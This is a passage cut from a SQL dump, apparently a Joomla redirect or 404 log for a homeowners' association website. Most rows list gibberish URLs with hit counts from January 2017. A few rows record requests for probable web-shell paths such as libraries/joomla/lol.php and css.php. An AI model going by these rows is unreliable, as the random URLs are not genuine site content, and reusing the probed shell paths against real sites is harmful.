00:00:00'),(3912,'http://www.hallcrestheights.org/k28664-jglet-i20162633-kymd-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-01-09 17:19:06','0000-00-00 00:00:00'),(3913,'http://www.hallcrestheights.org/tkuykfj-k36053-dnjjb-i20162630-ucyupa-jaylrl/',NULL,'','',2,0,'2017-01-09 17:23:53','0000-00-00 00:00:00'),(3914,'http://www.hallcrestheights.org/pcsc-qrufunp-kwxpo/ideotw-tvsoarm-osmgepla-i20162630-k23382-lheliyr-qiyqfufx.htm',NULL,'','',1,0,'2017-01-09 17:30:20','0000-00-00 00:00:00'),(3915,'http://www.hallcrestheights.org/i20162635-yembj-vhtqqd/k12607-ckzfl-tzte-rqbwnsw/',NULL,'','',1,0,'2017-01-09 17:30:31','0000-00-00 00:00:00'),(3916,'http://www.hallcrestheights.org/soegszx-k58373-yifet-vtndyu-i20162631-uhvfcy/',NULL,'','',1,0,'2017-01-09 17:31:26','0000-00-00 00:00:00'),(3917,'http://www.hallcrestheights.org/k58400-upttmnbe-atgrb-i20162634-nqcdcncx-rdhcpgz.htm',NULL,'','',1,0,'2017-01-09 17:31:30','0000-00-00 00:00:00'),(3918,'http://www.hallcrestheights.org/bsoap-azapst-asgmh-cqcm/i20162634-ckfrdtf-kgpvbchs-iwhorklv-k33207-zrtjrsy-oaayfwgd-xskmy/',NULL,'','',1,0,'2017-01-09 17:32:14','0000-00-00 00:00:00'),(3919,'http://www.hallcrestheights.org/k36800-zmkuedtz-jivyo-i20162634-qxifgxuh-xptvuhm.htm',NULL,'','',2,0,'2017-01-09 17:35:35','0000-00-00 00:00:00'),(3920,'http://www.hallcrestheights.org/i20162636-k55880-mrcqgbei-fuwgr-abtnwyrq-semgwko.htm',NULL,'','',1,0,'2017-01-09 17:38:10','0000-00-00 00:00:00'),(3921,'http://www.hallcrestheights.org/soegszx-yifet-i20162630-vtndyu-uhvfcy/zlsxx-qrox-aehksk-xyxemb-uqudtwq-ceyvu-ciwqw-k56423-sgfrvrjo/',NULL,'','',1,0,'2017-01-09 17:44:42','0000-00-00 00:00:00'),(3922,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-vfvt/i20162634-zpxbxkc-wjybtylw-osduieqg-k53907-wsogxhg-pisdhtni-rmjhv/',NULL,'','',1,0,'2017-01-09 17:45:59','0000-00-00 00:00:00'),(3923,'http://www.hallcrestheights.org/nfrkopd-k24173-obbum-i20162630-golzes-rkwtzq/',NULL,'','',1,0,'2017-01-09 17:49:18','0000-00-00 00:00:00'),(3924,'http://www.hallcrestheights.org/k37700-fadlajfn-lgfpc-i20162634-vwgmyhde-cwxbdeu.htm',NULL,'','',1,0,'2017-01-09 18:00:50','0000-00-00 00:00:00'),(3925,'http://www.hallcrestheights.org/i20162636-k56780-dvisciwb-vwkux-krbzomsm-vuclzup.htm',NULL,'','',1,0,'2017-01-09 18:16:04','0000-00-00 00:00:00'),(3926,'http://www.hallcrestheights.org/jglet-kymd-rqzn-i20162633-rvmlkswa-k7864-zvkecqqn.htm',NULL,'','',1,0,'2017-01-09 18:26:30','0000-00-00 00:00:00'),(3927,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-i20162633-lgeajanp-k28564-dmefnxhq.htm',NULL,'','',1,0,'2017-01-09 18:30:05','0000-00-00 00:00:00'),(3928,'http://www.hallcrestheights.org/cwhriwg-k36953-pekzq-i20162630-dwkvum-zbsaii/',NULL,'','',1,0,'2017-01-09 18:36:03','0000-00-00 00:00:00'),(3929,'http://www.hallcrestheights.org/k56680-fadlajfn-i20162636-lgfpc-vwgmyhde-cwxbdeu-dkov.htm',NULL,'','',1,0,'2017-01-09 18:37:36','0000-00-00 00:00:00'),(3930,'http://www.hallcrestheights.org/k37600-upttmnbe-atgrb-nqcdcncx-rdhcpgz-i20162634-zdll.htm',NULL,'','',1,0,'2017-01-09 18:42:49','0000-00-00 00:00:00'),(3931,'http://www.hallcrestheights.org/i20162635-xhajv-qlwczb-k457-iqsos-qxoq-kgqaqyd/',NULL,'','',1,0,'2017-01-09 18:43:08','0000-00-00 00:00:00'),(3932,'http://www.hallcrestheights.org/k35080-mrcqgbei-i20162636-fuwgr-abtnwyrq-semgwko-whme.htm',NULL,'','',1,0,'2017-01-09 18:43:19','0000-00-00 00:00:00'),(3933,'http://www.hallcrestheights.org/k36700-vqjnyspv-holjp-eurrtpil-uourxiv-i20162634-lbtr.htm',NULL,'','',1,0,'2017-01-09 18:43:39','0000-00-00 00:00:00'),(3934,'http://www.hallcrestheights.org/lugdl-trsm-k7664-xxhy-pzqjllzo-hnjumnte-i20162633-cwfogy.htm',NULL,'','',2,0,'2017-01-09 18:44:57','0000-00-00 00:00:00'),(3935,'http://www.hallcrestheights.org/ixnmu-eahw-k28364-hioz-hjxbnwpg-eyooayik-i20162633-uksszq.htm',NULL,'','',2,0,'2017-01-09 18:47:51','0000-00-00 00:00:00'),(3936,'http://www.hallcrestheights.org/upttmnbe-atgrb-i20162636-k35780-nqcdcncx-rdhcpgz-zdll-imvyx.htm',NULL,'','',1,0,'2017-01-09 18:51:00','0000-00-00 00:00:00'),(3937,'http://www.hallcrestheights.org/pcscqruf-unpkw-i20162636-k56480-xpoideot-wtvsoar-mosm-gepla.htm',NULL,'','',1,0,'2017-01-09 18:51:21','0000-00-00 00:00:00'),(3938,'http://www.hallcrestheights.org/i20162634-jgletkym-drqzn-k37400-rvmlkswa-zvkecqq-neei-aqjzl.htm',NULL,'','',1,0,'2017-01-09 18:51:40','0000-00-00 00:00:00'),(3939,'http://www.hallcrestheights.org/i20162634-ryvhrhmq-tyysl-k58100-lgeajanp-dmefnxh-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-09 18:51:49','0000-00-00 00:00:00'),(3940,'http://www.hallcrestheights.org/htxwhykr-i20162633-k18341-svsv-hudykbq-xdosfiet/',NULL,'','',1,0,'2017-01-09 18:53:35','0000-00-00 00:00:00'),(3941,'http://www.hallcrestheights.org/ixnmu-i20162633-eahw-hioz-hjxbnwpg-k7564-eyooayik-uksszq-cebaq.htm',NULL,'','',1,0,'2017-01-09 18:57:14','0000-00-00 00:00:00'),(3942,'http://www.hallcrestheights.org/edzvd-i20162633-lqco-mnnm-mcawvbfu-japyvrlf-k28264-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-09 18:57:42','0000-00-00 00:00:00'),(3943,'http://www.hallcrestheights.org/qlbowcig-i20162633-k19241-gece-ayafxrg-lnikghhm/',NULL,'','',1,0,'2017-01-09 18:58:16','0000-00-00 00:00:00'),(3944,'http://www.hallcrestheights.org/pcscqruf-k35680-unpkw-xpoideot-wtvsoar-i20162636-mosm-gepla-lheliy.htm',NULL,'','',1,0,'2017-01-09 18:58:22','0000-00-00 00:00:00'),(3945,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-i20162634-lgeajanp-dmefnxh-k37300-qfhj-dyhao-xrcjhw.htm',NULL,'','',1,0,'2017-01-09 19:05:34','0000-00-00 00:00:00'),(3946,'http://www.hallcrestheights.org/lugdltrs-mxxhy-i20162634-pzqjllzo-hnjumnt-ecwf-k58000-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-09 19:05:46','0000-00-00 00:00:00'),(3947,'http://www.hallcrestheights.org/i20162632-nfrkopdo-k59741-bbum-golzesr-kwtzqtqb/',NULL,'','',1,0,'2017-01-09 19:06:56','0000-00-00 00:00:00'),(3948,'http://www.hallcrestheights.org/jgletkym-drqzn-k56380-rvmlkswa-zvkecqq-i20162636-neei-aqjzl-nplqfc.htm',NULL,'','',1,0,'2017-01-09 19:10:15','0000-00-00 00:00:00'),(3949,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv-bbgzagp-k12557-eciyyuwu-vfztjigj-i20162635-inamzbc-ngtfmlyr-ghdfi-pwgd-qrkbhd/',NULL,'','',1,0,'2017-01-09 19:17:43','0000-00-00 00:00:00'),(3950,'http://www.hallcrestheights.org/cwhri-wgpekz/i20162634-qdwkv-k32507-umzb/',NULL,'','',1,0,'2017-01-09 19:17:48','0000-00-00 00:00:00'),(3951,'http://www.hallcrestheights.org/k27864-gnfzn-i20162633-xvjx-palt-itjshkyj-yldpijaa-mdurta-enpgg-wtdvlx.htm',NULL,'','',1,0,'2017-01-09 19:17:52','0000-00-00 00:00:00'),(3952,'http://www.hallcrestheights.org/pcscq-i20162633-rufu-npkw-xpoideot-k28764-wtvsoarm-osmgep-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-09 19:17:57','0000-00-00 00:00:00'),(3953,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-i20162634-abtnwyrq-semgwko-k36900-whme-mxgku-cybnpz-kicv.htm',NULL,'','',1,0,'2017-01-09 19:21:28','0000-00-00 00:00:00'),(3954,'http://www.hallcrestheights.org/k35280-ixnmueah-whioz-hjxbnwpg-eyooayi-i20162636-kuks-szqce-baqdom-ytni.htm',NULL,'','',1,0,'2017-01-09 19:24:29','0000-00-00 00:00:00'),(3955,'http://hallcrestheights.org/images/logo_img.php',NULL,'http://hallcrestheights.org/images/logo_img.php','',48,0,'2017-01-09 19:29:03','0000-00-00 00:00:00'),(3956,'http://www.hallcrestheights.org/fadlajfn-lgfpc-i20162634-vwgmyhde-cwxbdeu-k58500-dkov-fiibp-tquhzx-chhr.htm',NULL,'','',1,0,'2017-01-09 19:29:46','0000-00-00 00:00:00'),(3957,'http://www.hallcrestheights.org/xhajvqlw-i20162633-k39041-czbi-qsosqxo-qkgqaqyd/',NULL,'','',1,0,'2017-01-09 19:30:51','0000-00-00 00:00:00'),(3958,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-i20162636-k55980-flxh-qjkuh-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-09 19:37:20','0000-00-00 00:00:00'),(3959,'http://www.hallcrestheights.org/oiyizgol-k38501-rcmw-i20162630-fbsnopd-gfnhskrl/',NULL,'','',1,0,'2017-01-09 19:43:32','0000-00-00 00:00:00'),(3960,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-hiij/imjnjbo-gtsakbcc-gyfmdvju-xzlekts-k12207-lshxosqq-i20162635-jvfyo-ihtt/',NULL,'','',1,0,'2017-01-09 19:44:17','0000-00-00 00:00:00'),(3961,'http://www.hallcrestheights.org/k56880-gnfznxvj-xpalt-itjshkyj-yldpija-i20162636-amdu-rtaen-pggwtd-vlxt.htm',NULL,'','',1,0,'2017-01-09 19:44:23','0000-00-00 00:00:00'),(3962,'http://www.hallcrestheights.org/nfrko-pdobbu/mgolz-i20162635-k12707-esrk/',NULL,'','',1,0,'2017-01-09 19:44:39','0000-00-00 00:00:00'),(3963,'http://www.hallcrestheights.org/ajqxx-ucuzao-i20162634-k33007-fifep/hiij-imjnjbo-gtsakbcc-gyfmdvju/',NULL,'','',1,0,'2017-01-09 19:49:24','0000-00-00 00:00:00'),(3964,'http://www.hallcrestheights.org/kzpff-k32707-msxklr-dedhw-gefv/bbgzagp-eciyyuwu-i20162634-vfztjigj-inamzbc-ngtfmlyr/',NULL,'','',1,0,'2017-01-09 19:49:44','0000-00-00 00:00:00'),(3965,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos/i20162635-qxoq-kgqaqyd-cptznzvt-jqoevpca-k12807-qwjaluw/',NULL,'','',1,0,'2017-01-09 19:49:53','0000-00-00 00:00:00'),(3966,'http://www.hallcrestheights.org/oiyizgol-i20162633-k17441-rcmw-fbsnopd-gfnhskrl/',NULL,'','',1,0,'2017-01-09 19:52:48','0000-00-00 00:00:00'),(3967,'http://www.hallcrestheights.org/vqjny-k27964-spvh-oljp-eurrtpil-uourxivl-i20162633-btrhnn-mtqzk-owtsxp-pbgrr.htm',NULL,'','',1,0,'2017-01-09 19:56:03','0000-00-00 00:00:00'),(3968,'http://www.hallcrestheights.org/yembj-vhtqqd/i20162634-ckzfl-k33407-tzte/',NULL,'','',1,0,'2017-01-09 19:56:36','0000-00-00 00:00:00'),(3969,'http://www.hallcrestheights.org/bsoapaza-k37601-psta-i20162630-sgmhcqc-mckfrdtf/',NULL,'','',1,0,'2017-01-09 20:00:16','0000-00-00 00:00:00'),(3970,'http://www.hallcrestheights.org/edzvdlqc-k37000-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-i20162634-kcmumb-hmgz-nkoheyru.htm',NULL,'','',1,0,'2017-01-09 20:03:31','0000-00-00 00:00:00'),(3971,'http://www.hallcrestheights.org/kzpffmsx-k59201-klrd-i20162630-edhwgef-vbbgzagp/',NULL,'','',1,0,'2017-01-09 20:08:26','0000-00-00 00:00:00'),(3972,'http://www.hallcrestheights.org/ixnmueah-k56080-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-ytni-i20162636-holbdent.htm',NULL,'','',1,0,'2017-01-09 20:09:15','0000-00-00 00:00:00'),(3973,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k15230-pzqjllzo-hnjumnt/ecwf-ogywb-iwyrur-fgvf-i20162636-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-09 20:14:05','0000-00-00 00:00:00'),(3974,'http://www.hallcrestheights.org/lugdltrs-k35380-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-i20162636-cwqzhrib.htm',NULL,'','',1,0,'2017-01-09 20:15:07','0000-00-00 00:00:00'),(3975,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-glnik-i20162629-k36349-ghhm/',NULL,'','',1,0,'2017-01-09 20:19:48','0000-00-00 00:00:00'),(3976,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-i20162633-lgeajanp-k7764-dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw.htm',NULL,'','',2,0,'2017-01-09 20:23:39','0000-00-00 00:00:00'),(3977,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-i20162634-cwqzhrib-k37200-nknyfeeb-sbjhfk.htm',NULL,'','',1,0,'2017-01-09 20:30:16','0000-00-00 00:00:00'),(3978,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh-k56280-qfhj-dyhao-xrcjhw-uvds-vezytwlc-ycwscpua-i20162636-kqnjtn.htm',NULL,'','',1,0,'2017-01-09 20:33:50','0000-00-00 00:00:00'),(3979,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh-xptvuhmi-i20162633-wnzkor-pvubf-gnqtpm-k28064-hprbi-kzonmtl-ajholjr-dklt.htm',NULL,'','',1,0,'2017-01-09 20:38:02','0000-00-00 00:00:00'),(3980,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-i20162636-k56180-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-09 20:39:01','0000-00-00 00:00:00'),(3981,'http://www.hallcrestheights.org/i20162630-k27745-soeg-szxyife-tvtndyu-uhvfc-yzlsx/',NULL,'','',1,0,'2017-01-09 20:39:12','0000-00-00 00:00:00'),(3982,'http://www.hallcrestheights.org/qlbow-ciggec/k33307-eayaf-xrgl-i20162634-nikghhm/',NULL,'','',1,0,'2017-01-09 20:40:22','0000-00-00 00:00:00'),(3983,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-yuuh-vfcyzls-k33257-xxqroxae-i20162634-hkskxyxe-mbuqudt-wqceyvuc-iwqws-gfrv-rjodsu/',NULL,'','',1,0,'2017-01-09 20:43:07','0000-00-00 00:00:00'),(3984,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-i20162634-baqdom-ytni-k37100-holbdent-afymluze-xtlfgg-csdimr.htm',NULL,'','',1,0,'2017-01-09 20:46:03','0000-00-00 00:00:00'),(3985,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-xrcjhw-uvds-i20162636-k35480-vezytwlc-ycwscpua-kqnjtn-plyjup.htm',NULL,'','',1,0,'2017-01-09 20:46:35','0000-00-00 00:00:00'),(3986,'http://www.hallcrestheights.org/k28105-kzpf-fmsxklr-dedhwge-fvbbg-i20162629-zagpe/',NULL,'','',1,0,'2017-01-09 20:47:47','0000-00-00 00:00:00'),(3987,'http://www.hallcrestheights.org/i20162630-k26845-ajqx-xucuzao-fifephi-ijimj-njbog/',NULL,'','',2,0,'2017-01-09 20:50:42','0000-00-00 00:00:00'),(3988,'http://www.hallcrestheights.org/nfrkopd-i20162631-obbum-golzes-k8053-rkwtzq-tqbsv/',NULL,'','',1,0,'2017-01-09 20:56:37','0000-00-00 00:00:00'),(3989,'http://www.hallcrestheights.org/i20162632-k60164-fadla-jfnl-gfpc-vwgmyhde.htm',NULL,'','',1,0,'2017-01-09 20:59:37','0000-00-00 00:00:00'),(3990,'http://www.hallcrestheights.org/qlbow-ciggec/i20162634-eayaf-k54107-xrgl/',NULL,'','',1,0,'2017-01-09 21:01:33','0000-00-00 00:00:00'),(3991,'http://www.hallcrestheights.org/k27205-wbwp-bonkydh-xjjikvf-vtzpx-i20162629-bxkcw/',NULL,'','',1,0,'2017-01-09 21:02:34','0000-00-00 00:00:00'),(3992,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb/saiimjz-fozgdvdd-qjvdobkn-i20162635-lykcone-dwjmaxev-ortbz-qsax-k13007-idihgn/',NULL,'','',1,0,'2017-01-09 21:03:52','0000-00-00 00:00:00'),(3993,'http://www.hallcrestheights.org/i20162636-k45080-dvisciwb-vwkux-krbzomsm-vuclzup.htm',NULL,'','',1,0,'2017-01-09 21:06:22','0000-00-00 00:00:00'),(3994,'http://www.hallcrestheights.org/soegs-zxyife-i20162634-tvtnd/yuuh-vfcyzls-xxqroxae-hkskxyxe-k32607-mbuqudt/',NULL,'','',1,0,'2017-01-09 21:08:28','0000-00-00 00:00:00'),(3995,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-paja/ylrlwfv-dyruqpkl-k32907-sdefhxdf-pdfufpf-i20162634-ajnpvzat-tuxdw-vpee/',NULL,'','',1,0,'2017-01-09 21:08:39','0000-00-00 00:00:00'),(3996,'http://www.hallcrestheights.org/htxwh-k12907-ykrsvs-vhudy-kbqx/dosfiet-yuaixnrb-dggsaarh-i20162635-efskjyd-mrujwimj/',NULL,'','',1,0,'2017-01-09 21:10:19','0000-00-00 00:00:00'),(3997,'http://www.hallcrestheights.org/wbwpbon-i20162631-kydhx-jjikvf-k8953-vtzpxb-xkcwj/',NULL,'','',1,0,'2017-01-09 21:12:10','0000-00-00 00:00:00'),(3998,'http://www.hallcrestheights.org/bsoapaz-apsta-sgmhcq/k55723-cmckfr-dtfkg-i20162630-pvbc-hsiwho/',NULL,'','',1,0,'2017-01-09 21:12:21','0000-00-00 00:00:00'),(3999,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-xrgl/nikghhm-i20162635-bbxpgesm-rcaiztbi-k12507-auwdtvi-xpmtzhzz-wzrqr/',NULL,'','',1,0,'2017-01-09 21:14:27','0000-00-00 00:00:00'),(4000,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-i20162633-krbzomsm-k18664-vuclzuph.htm',NULL,'','',1,0,'2017-01-09 21:15:21','0000-00-00 00:00:00'),(4001,'http://www.hallcrestheights.org/k50605-wbwp-bonkydh-xjjikvf-vtzpx-i20162629-bxkcw/',NULL,'','',1,0,'2017-01-09 21:17:28','0000-00-00 00:00:00'),(4002,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-paja/ylrlwfv-dyruqpkl-sdefhxdf-i20162635-pdfufpf-ajnpvzat-tuxdw-vpee-k12107-klyzxq/',NULL,'','',1,0,'2017-01-09 21:18:45','0000-00-00 00:00:00'),(4003,'http://www.hallcrestheights.org/upttm-nbea-i20162632-tgrb-nqcdcncx-k60064-rdhcpgzz.htm',NULL,'','',1,0,'2017-01-09 21:21:09','0000-00-00 00:00:00'),(4004,'http://www.hallcrestheights.org/k45880-ryvhrhmq-i20162636-tyysl-lgeajanp-dmefnxh-qfhj.htm',NULL,'','',1,0,'2017-01-09 21:23:19','0000-00-00 00:00:00'),(4005,'http://www.hallcrestheights.org/joifa/formmail/book_award.html',NULL,'','',7,0,'2017-01-09 21:27:44','0000-00-00 00:00:00'),(4006,'http://www.hallcrestheights.org/k48445-cwhr-iwgpekz-qdwkvum-zbsai-i20162629-imjzf/',NULL,'','',1,0,'2017-01-09 21:29:15','0000-00-00 00:00:00'),(4007,'http://hallcrestheights.org/libraries/joomla/lol.php',NULL,'','',11,0,'2017-01-09 21:30:16','0000-00-00 00:00:00'),(4008,'http://hallcrestheights.org/libraries/joomla/css.php',NULL,'','',47,0,'2017-01-09 21:30:16','0000-00-00 00:00:00'),(4009,'http://www.hallcrestheights.org/k24280-dvisciwb-i20162636-vwkux-krbzomsm-vuclzup-hvqa.htm',NULL,'','',1,0,'2017-01-09 21:35:02','0000-00-00 00:00:00'),(4010,'http://www.hallcrestheights.org/edzvdlqc-omnnm-k60790-mcawvbfu/japyvrl-flxh-i20162637-qjkuh-kcmumb.htm',NULL,'','',1,0,'2017-01-09 21:36:23','0000-00-00 00:00:00'),(4011,'http://www.hallcrestheights.org/uptt-k23482-mnbeatg-i20162630-rbnqc-dcncxr/dhcpgzz-dllimvyx-jltfeob-kebwivsm-qkrf.htm',NULL,'','',1,0,'2017-01-09 21:39:08','0000-00-00 00:00:00'),(4012,'http://www.hallcrestheights.org/k29005-xhaj-vqlwczb-iqsosqx-oqkgq-i20162629-aqydc/',NULL,'','',1,0,'2017-01-09 21:39:37','0000-00-00 00:00:00'),(4013,'http://www.hallcrestheights.org/jglet-kymd-k59864-rqzn-rvmlkswa-i20162632-zvkecqqn-eeiaqj.htm',NULL,'','',1,0,'2017-01-09 21:41:09','0000-00-00 00:00:00'),(4014,'http://www.hallcrestheights.org/k49345-yemb-jvhtqqd-ckzfltz-terqb-i20162629-wnswn/',NULL,'','',1,0,'2017-01-09 21:44:06','0000-00-00 00:00:00'),(4015,'http://www.hallcrestheights.org/upttm-nbea-k18464-tgrb-nqcdcncx-rdhcpgzz-i20162633-dllimv.htm',NULL,'','',1,0,'2017-01-09 21:47:05','0000-00-00 00:00:00'),(4016,'http://www.hallcrestheights.org/lugdltrs-mxxhy-i20162636-k24980-pzqjllzo-hnjumnt-ecwf-ogywb.htm',NULL,'','',1,0,'2017-01-09 21:50:32','0000-00-00 00:00:00'),(4017,'http://www.hallcrestheights.org/k47905-ajqx-xucuzao-fifephi-ijimj-i20162629-njbog/',NULL,'','',1,0,'2017-01-09 21:53:00','0000-00-00 00:00:00'),(4018,'http://www.hallcrestheights.org/ixnmueah-whioz-i20162636-k45680-hjxbnwpg-eyooayi-kuks-szqce.htm',NULL,'','',1,0,'2017-01-09 21:55:56','0000-00-00 00:00:00'),(4019,'http://www.hallcrestheights.org/i20162630-ajqxxuc-uzaof-ifephi-k24973-ijimjn-jbogt/',NULL,'','',1,0,'2017-01-09 22:01:24','0000-00-00 00:00:00'),(4020,'http://www.hallcrestheights.org/i20162632-mrcqg-beif-k60664-uwgr-abtnwyrq-semgwkow-hmemxg-kucyb.htm',NULL,'','',1,0,'2017-01-09 22:06:28','0000-00-00 00:00:00'),(4021,'http://www.hallcrestheights.org/i20162630-bsoapaz-apsta-sgmhcq-k58453-cmckfr-dtfkg/',NULL,'','',1,0,'2017-01-09 22:06:35','0000-00-00 00:00:00'),(4022,'http://www.hallcrestheights.org/upttmn-beatgr-bnqcdc/k54526-ncxr-dhcpgz-i20162637-zdllim-vyxjl.htm',NULL,'','',1,0,'2017-01-09 22:07:30','0000-00-00 00:00:00'),(4023,'http://www.hallcrestheights.org/i20162636-wbwpbo-nkydhxjj/ikvf-k10799-vtzpx/',NULL,'','',1,0,'2017-01-09 22:09:30','0000-00-00 00:00:00'),(4024,'http://www.hallcrestheights.org/oiyizg-i20162629-olrcmwfb-snop-dgfnh-skrl-k35849-jrgfctf-zfiwxwm-akoay-osmpql-gveg-dfvgcrcb-zmqnoduu/',NULL,'','',1,0,'2017-01-09 22:10:08','0000-00-00 00:00:00'),(4025,'http://www.hallcrestheights.org/pcscq-i20162633-rufu-npkw-k18364-xpoideot-wtvsoarm-osmgep-lalhe.htm',NULL,'','',1,0,'2017-01-09 22:11:18','0000-00-00 00:00:00'),(4026,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-k45580-japyvrl-i20162636-flxh-qjkuh-kcmumb.htm',NULL,'','',1,0,'2017-01-09 22:16:48','0000-00-00 00:00:00'),(4027,'http://www.hallcrestheights.org/ixnmueah-whioz-k24880-hjxbnwpg-eyooayi-i20162636-kuks-szqce-baqdom.htm',NULL,'','',1,0,'2017-01-09 22:19:44','0000-00-00 00:00:00'),(4028,'http://www.hallcrestheights.org/i20162632-k60264-dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-zvsgcr.htm',NULL,'','',1,0,'2017-01-09 22:26:59','0000-00-00 00:00:00'),(4029,'http://www.hallcrestheights.org/i20162630-xhajvql-wczbi-qsosqx-k57553-oqkgqa-qydcp/',NULL,'','',1,0,'2017-01-09 22:28:38','0000-00-00 00:00:00'),(4030,'http://www.hallcrestheights.org/k18864-vqjny-i20162633-spvh-oljp-eurrtpil-uourxivl-btrhnn-mtqzk-owtsxp.htm',NULL,'','',1,0,'2017-01-09 22:33:30','0000-00-00 00:00:00'),(4031,'http://www.hallcrestheights.org/k24480-vqjnyspv-holjp-eurrtpil-uourxiv-i20162636-lbtr-hnnmt-qzkowt-sxpp.htm',NULL,'','',1,0,'2017-01-09 22:34:48','0000-00-00 00:00:00'),(4032,'http://www.hallcrestheights.org/i20162630-qlbowci-ggece-ayafxr-k44773-glnikg-hhmbb/',NULL,'','',1,0,'2017-01-09 22:37:31','0000-00-00 00:00:00'),(4033,'http://www.hallcrestheights.org/i20162630-oiyizgo-lrcmw-fbsnop-k35953-dgfnhs-krljr/',NULL,'','',2,0,'2017-01-09 22:40:36','0000-00-00 00:00:00'),(4034,'http://www.hallcrestheights.org/ryvh-rhmqtyy-i20162630-k12782-sllge-ajanpd/mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-wlcy-cwscpuak-qnjtnply-jupsujj.htm',NULL,'','',1,0,'2017-01-09 22:42:25','0000-00-00 00:00:00'),(4035,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-i20162636-k45180-amdu-rtaen-pggwtd-vlxt.htm',NULL,'','',1,0,'2017-01-09 22:43:34','0000-00-00 00:00:00'),(4036,'http://www.hallcrestheights.org/uptt-mnbeatg/i20162634-k21662-rbnqc-dcncxr.htm',NULL,'','',1,0,'2017-01-09 22:45:20','0000-00-00 00:00:00'),(4037,'http://www.hallcrestheights.org/lugdl-k18064-trsm-xxhy-pzqjllzo-hnjumnte-i20162633-cwfogy-wbiwy-rurfgv-fcwqz.htm',NULL,'','',1,0,'2017-01-09 22:46:27','0000-00-00 00:00:00'),(4038,'http://www.hallcrestheights.org/gnfzn-k60364-xvjx-palt-itjshkyj-i20162632-yldpijaa-mdurta-enpgg-wtdvlx-tdqku.htm',NULL,'','',1,0,'2017-01-09 22:50:03','0000-00-00 00:00:00'),(4039,'http://www.hallcrestheights.org/i20162630-yembjvh-tqqdc-kzfltz-k24073-terqbw-nswns/',NULL,'','',1,0,'2017-01-09 22:52:20','0000-00-00 00:00:00'),(4040,'http://www.hallcrestheights.org/hh-bradford2-floor-plan.pdf',NULL,'','',55,0,'2017-01-09 22:54:13','0000-00-00 00:00:00'),(4041,'http://www.hallcrestheights.org/i20162630-htxwhyk-rsvsv-hudykb-k36853-qxdosf-ietyu/',NULL,'','',2,0,'2017-01-09 22:55:18','0000-00-00 00:00:00'),(4042,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-i20162631-jaylrl-wfvdy-k8753-ruqp/',NULL,'','',1,0,'2017-01-09 22:58:16','0000-00-00 00:00:00'),(4043,'http://www.hallcrestheights.org/zmkuedtz-k24580-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-i20162636-prbikzon.htm',NULL,'','',1,0,'2017-01-09 23:04:13','0000-00-00 00:00:00'),(4044,'http://www.hallcrestheights.org/vqjnyspv-k45280-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-i20162636-bgrrcdsi.htm',NULL,'','',1,0,'2017-01-09 23:10:09','0000-00-00 00:00:00'),(4045,'http://www.hallcrestheights.org/oiyizgo-lrcmw-i20162630-fbsnop-dgfnhs-krljr-k24773-gfct/',NULL,'','',1,0,'2017-01-09 23:13:15','0000-00-00 00:00:00'),(4046,'http://www.hallcrestheights.org/xhaj-i20162629-vqlwczb-iqsosqx-oqkgq-aqydc-k18605-ptznzvt-jqoe-vpcaqwja-luwty-bckbsx-bnbgn-ndorcaj/',NULL,'','',1,0,'2017-01-09 23:16:16','0000-00-00 00:00:00'),(4047,'http://www.hallcrestheights.org/k19590-jgletkym-drqzn-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-i20162628-ilnvoxbd-jveebikp.htm',NULL,'','',1,0,'2017-01-09 23:17:21','0000-00-00 00:00:00'),(4048,'http://www.hallcrestheights.org/yembjv-i20162629-htqqdckz-fltz-terqb-wnsw-k5249-nsnjplp-ftrrjnc-ypjoq-wgzjev-ihsd-pacaylhy-ayzeueiz/',NULL,'','',1,0,'2017-01-09 23:19:23','0000-00-00 